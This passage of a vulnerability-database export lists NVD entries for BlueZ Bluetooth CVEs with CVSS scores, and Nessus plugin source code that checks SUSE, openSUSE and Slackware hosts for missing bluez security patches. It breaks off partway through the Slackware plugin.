"UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-09T16:29:00", "title": "CVE-2016-7837", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7837"], "modified": "2020-04-03T00:15:00", "cpe": ["cpe:/a:bluez:bluez:5.41"], "id": "CVE-2016-7837", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7837", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:bluez:bluez:5.41:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:14", "description": "In BlueZ 5.42, a buffer overflow was observed in \"pin_code_reply_dump\" function in \"tools/parser/hci.c\" source file. 
The issue exists because \"pin\" array is overflowed by supplied parameter due to lack of boundary checks on size of the buffer from frame \"pin_code_reply_cp *cp\" parameter.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2016-12-03T06:59:00", "title": "CVE-2016-9800", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9800"], "modified": "2016-12-07T19:32:00", "cpe": ["cpe:/a:bluez:bluez:5.42"], "id": "CVE-2016-9800", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9800", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:bluez:bluez:5.42:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2021-02-01T06:50:51", "description": "This update for bluez fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2016-7837: Fixed possible buffer overflow, make sure we don't\nwrite past the end of the array.(bsc#1026652)\n\nCVE-2016-9800: Fix hcidump memory leak in pin_code_reply_dump()\n(bsc#1013721).\n\nCVE-2016-9801: Fixed a buffer overflow in set_ext_ctrl function\n(bsc#1013732)\n\nCVE-2016-9804: Fix hcidump 
buffer overflow in commands_dump()\n(bsc#1013877).\n\nCVE-2016-9918: Fixed an out-of-bounds read in packet_hexdump()\n(bsc#1015173)\n\nCVE-2017-1000250: Fixed a information leak in SDP (part of the\nrecently published BlueBorne vulnerabilities) (bsc#1057342)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 19, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-03-01T00:00:00", "title": "SUSE SLES12 Security Update : bluez (SUSE-SU-2019:0510-1) (BlueBorne)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7837", "CVE-2017-1000250", "CVE-2016-9800", "CVE-2016-9801", "CVE-2016-9918", "CVE-2016-9804"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libbluetooth3-debuginfo", "p-cpe:/a:novell:suse_linux:bluez", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:bluez-debuginfo", "p-cpe:/a:novell:suse_linux:libbluetooth3", "p-cpe:/a:novell:suse_linux:bluez-debugsource"], "id": "SUSE_SU-2019-0510-1.NASL", "href": "https://www.tenable.com/plugins/nessus/122530", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:0510-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122530);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2020/02/07\");\n\n script_cve_id(\"CVE-2016-7837\", \"CVE-2016-9800\", \"CVE-2016-9801\", \"CVE-2016-9804\", \"CVE-2016-9918\", \"CVE-2017-1000250\");\n\n script_name(english:\"SUSE SLES12 Security Update : bluez (SUSE-SU-2019:0510-1) (BlueBorne)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n 
attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for bluez fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2016-7837: Fixed possible buffer overflow, make sure we don't\nwrite past the end of the array.(bsc#1026652)\n\nCVE-2016-9800: Fix hcidump memory leak in pin_code_reply_dump()\n(bsc#1013721).\n\nCVE-2016-9801: Fixed a buffer overflow in set_ext_ctrl function\n(bsc#1013732)\n\nCVE-2016-9804: Fix hcidump buffer overflow in commands_dump()\n(bsc#1013877).\n\nCVE-2016-9918: Fixed an out-of-bounds read in packet_hexdump()\n(bsc#1015173)\n\nCVE-2017-1000250: Fixed a information leak in SDP (part of the\nrecently published BlueBorne vulnerabilities) (bsc#1057342)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1013721\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1013732\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1013877\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1015173\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1026652\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1057342\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7837/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://www.suse.com/security/cve/CVE-2016-9800/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-9801/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-9804/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-9918/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000250/\"\n );\n # https://www.suse.com/support/update/announcement/2019/suse-su-20190510-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?69fdcf82\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2019-510=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2019-510=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2019-510=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-7837\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bluez\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bluez-debuginfo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bluez-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libbluetooth3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libbluetooth3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/01\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0/1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"bluez-5.13-3.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"bluez-debuginfo-5.13-3.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"bluez-debugsource-5.13-3.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libbluetooth3-5.13-3.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libbluetooth3-debuginfo-5.13-3.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"bluez-5.13-3.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"bluez-debuginfo-5.13-3.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"bluez-debugsource-5.13-3.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libbluetooth3-5.13-3.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libbluetooth3-debuginfo-5.13-3.10.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bluez\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T12:31:15", 
"description": "This update for bluez fixes the following vulnerabilities :\n\n - CVE-2016-7837: Buffer overflow in parse_line function\n (bsc#1026652)\n\n - CVE-2017-1000250: information disclosure vulnerability\n in service_search_attr_req (bsc#1057342)", "edition": 18, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-10-23T00:00:00", "title": "openSUSE Security Update : bluez (openSUSE-2017-1176) (BlueBorne)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7837", "CVE-2017-1000250"], "modified": "2017-10-23T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bluez-test", "p-cpe:/a:novell:opensuse:bluez-debuginfo", "p-cpe:/a:novell:opensuse:libbluetooth3-debuginfo-32bit", "p-cpe:/a:novell:opensuse:bluez-devel-32bit", "p-cpe:/a:novell:opensuse:libbluetooth3-debuginfo", "p-cpe:/a:novell:opensuse:libbluetooth3-32bit", "p-cpe:/a:novell:opensuse:bluez-devel", "p-cpe:/a:novell:opensuse:bluez-cups-debuginfo", "cpe:/o:novell:opensuse:42.3", "cpe:/o:novell:opensuse:42.2", "p-cpe:/a:novell:opensuse:bluez-cups", "p-cpe:/a:novell:opensuse:bluez-test-debuginfo", "p-cpe:/a:novell:opensuse:bluez", "p-cpe:/a:novell:opensuse:bluez-debugsource", "p-cpe:/a:novell:opensuse:libbluetooth3"], "id": "OPENSUSE-2017-1176.NASL", "href": "https://www.tenable.com/plugins/nessus/104080", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-1176.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104080);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-7837\", \"CVE-2017-1000250\");\n\n script_name(english:\"openSUSE Security Update : bluez (openSUSE-2017-1176) (BlueBorne)\");\n 
script_summary(english:\"Check for the openSUSE-2017-1176 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for bluez fixes the following vulnerabilities :\n\n - CVE-2016-7837: Buffer overflow in parse_line function\n (bsc#1026652)\n\n - CVE-2017-1000250: information disclosure vulnerability\n in service_search_attr_req (bsc#1057342)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1026652\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1057342\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bluez packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bluez\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bluez-cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bluez-cups-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bluez-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bluez-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bluez-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bluez-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bluez-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bluez-test-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:libbluetooth3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libbluetooth3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libbluetooth3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libbluetooth3-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"bluez-5.41-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", 
reference:\"bluez-cups-5.41-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"bluez-cups-debuginfo-5.41-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"bluez-debuginfo-5.41-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"bluez-debugsource-5.41-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"bluez-devel-5.41-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"bluez-test-5.41-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"bluez-test-debuginfo-5.41-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libbluetooth3-5.41-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libbluetooth3-debuginfo-5.41-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"bluez-devel-32bit-5.41-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libbluetooth3-32bit-5.41-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libbluetooth3-debuginfo-32bit-5.41-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"bluez-5.41-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"bluez-cups-5.41-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"bluez-cups-debuginfo-5.41-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"bluez-debuginfo-5.41-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"bluez-debugsource-5.41-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"bluez-devel-5.41-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"bluez-test-5.41-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"bluez-test-debuginfo-5.41-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libbluetooth3-5.41-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libbluetooth3-debuginfo-5.41-6.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"bluez-devel-32bit-5.41-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libbluetooth3-32bit-5.41-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libbluetooth3-debuginfo-32bit-5.41-6.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bluez / bluez-cups / bluez-cups-debuginfo / bluez-debuginfo / etc\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T09:11:04", "description": "New bluez packages are available for Slackware 13.1, 13.37, 14.0,\n14.1, 14.2, and -current to fix a security issue.", "edition": 27, "cvss3": {"score": 6.5, "vector": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-18T00:00:00", "title": "Slackware 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : bluez (SSA:2017-258-01) (BlueBorne)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000250"], "modified": "2017-09-18T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.2", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux", "p-cpe:/a:slackware:slackware_linux:bluez", "cpe:/o:slackware:slackware_linux:13.1"], "id": "SLACKWARE_SSA_2017-258-01.NASL", "href": "https://www.tenable.com/plugins/nessus/103255", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2017-258-01. 
The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103255);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-1000250\");\n script_xref(name:\"SSA\", value:\"2017-258-01\");\n\n script_name(english:\"Slackware 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : bluez (SSA:2017-258-01) (BlueBorne)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New bluez packages are available for Slackware 13.1, 13.37, 14.0,\n14.1, 14.2, and -current to fix a security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.505994\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b4e6d349\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bluez package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:bluez\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/15\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.1\", pkgname:\"bluez\", pkgver:\"4.64\", pkgarch:\"i486\", pkgnum:\"2_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"bluez\", pkgver:\"4.64\", pkgarch:\"x86_64\", pkgnum:\"2_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"bluez\", pkgver:\"4.91\", pkgarch:\"i486\", pkgnum:\"2_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"bluez\", pkgver:\"4.91\", pkgarch:\"x86_64\", pkgnum:\"2_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"bluez\", pkgver:\"4.99\", pkgarch:\"i486\", pkgnum:\"3_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", 
